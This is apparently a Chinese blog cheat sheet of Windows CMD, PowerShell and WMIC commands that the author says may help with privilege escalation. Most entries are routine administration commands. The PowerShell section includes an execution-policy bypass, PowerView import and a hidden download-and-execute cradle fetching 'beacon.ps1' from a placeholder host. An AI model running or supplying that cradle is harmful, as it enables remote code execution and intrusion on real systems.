记录一些命令,也许会在提权时用到。

目录

CMD

目录操作

md test ::创建test目录
rd ::删除目录,只能删除空目录

cd 路径 ::进入目录
cd \ ::回到根目录
cd .. ::返回上一级目录

dir :: 显示磁盘目录的内容
dir /p
dir /w ::只显示名字
dir /s ::递归查询(查询所有文件,文件夹)
dir /o ::排序显示
dir /a ::查看所有文件的属性

tree ::以树形结构显示内容
tree /f ::显示当前目录所有文件夹与文件的结构
tree /f >txt.txt  ::可将目录文件写到txt.txt文件中
tree /a ::使用ASCII字符不使用拓展字符

文件操作

echo 内容 >1.php    ::将内容写入文件1.php
copy 源目录目录 目的目录或文件
xcopy :: 这些命令等用到再查选项
robocopy :: 这些命令等用到再查选项,这个命令是比较新的版本才有的。
del ::删除文件,/q删除不显提示,/f强制删除,/s递归删除,/p删除多个文件时对每个文件询问是否删除
ren 原名 现名 ::对文件改名,dos7.0及以后可以改目录名与文件名
move 源文件 目的地文件 ::对文件进行移动
type ::显示文本文件,以文本方式查看

系统属性

ver :: 显示当前运行的DOS版本号
cls ::清除命令行内容

进程

tasklist /SVC :: SVC 会显示进程属于哪个服务。
TASKLIST /V /FO TABLE -FI "USERNAME eq SYSTEM" :: -FI 过滤器显示用户名为 SYSTEM 的进程,-FO 输出以表格的形式展示,/V 显示详细信息
taskkill /IM cmd.exe :: IM按照进程名称结束它,/PID按照PID结束。

网络

netstat -ano :: -o显示进程号,-n不解析地址,-a显示所有连接

系统信息

systeminfo | findstr "你想搜的内容"

以下命令可在命令行或运行窗口输入

taskschd.msc :: 任务计划
eventvwr :: 事件管理
taskmgr :: 任务管理器
compmgmt.msc :: 计算机管理
lusrmgr.msc :: 用户管理
msconfig :: 系统配置(一般用来看启动项)
wf.msc :: 防火墙配置
gpedit.msc :: 组策略配置
regedit :: 注册表
ncpa.cpl :: 网络连接适配器
control :: 控制面板
appwiz.cpl :: 控制面板程序管理

以其他用户权限运行程序

runas  /user:<UserName> Command
runas  /user:<UserName> "Command /Options /Parm"

PowerShell

PowerShell 默认策略是不允许执行脚本。

PS C:\Users\bunny\desktop> Set-ExecutionPolicy -ExecutionPolicy ByPass -Scope CurrentUser

导入脚本作为模块,去执行里面的方法。

PS C:\Users\bunny\desktop> Import-Module .\PowerView.ps1

下载远程脚本并执行

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<Host>/beacon.ps1'))"

筛选进程

PS C:\Users\gbb> Get-Process -IncludeUserName | Where-Object {$_.UserName -Like "*gbb*"} | Format-Table -AutoSize

Handles  WS(K) CPU(s)    Id UserName     ProcessName
-------  ----- ------    -- --------     -----------
    609  64980  19.94 14576 RAINGRAY\gbb Adguard
    140  24116   0.00  9116 RAINGRAY\gbb ai
    388  44432   0.14 16564 RAINGRAY\gbb ApplicationFrameHost
    532 169240   7.91 13508 RAINGRAY\gbb BingWallpaperApp
    141   9104   0.00  2492 RAINGRAY\gbb ChsIME
......

通过筛 Get-Process 输出的对象中 UserName 包含 gbb 关键字的行内容,最后通过 Format-Table -AutoSIze 根据数据宽度美化展示结果。

WMIC

命令 介绍
wmic [alias] get /?(需要进一步验证) List all attributes
wmic [alias] call /?(需要进一步验证) Callable methods
wmic process list full Process attributes
wmic startupwmic service(需要进一步验证) Starts wmic service
wmic ntdomain list Domain and DC info
wmic qfe List all patches
wmic process call create "process name" Execute process。火绒会告警
wmic process where name="process" call terminate Terminate process。火绒会告警
wmic logicaldisk get description,name View logical shares
wmic cpu get DataWidth /format:list Display 32 I I 64 bit Display 32 I I 64 bit

参考资料

最近更新:

发布时间:

仅有一条评论

  1. 王叨叨

    除了文件操作用的比较少,其他的都经常用…

    回复

摆哈儿龙门阵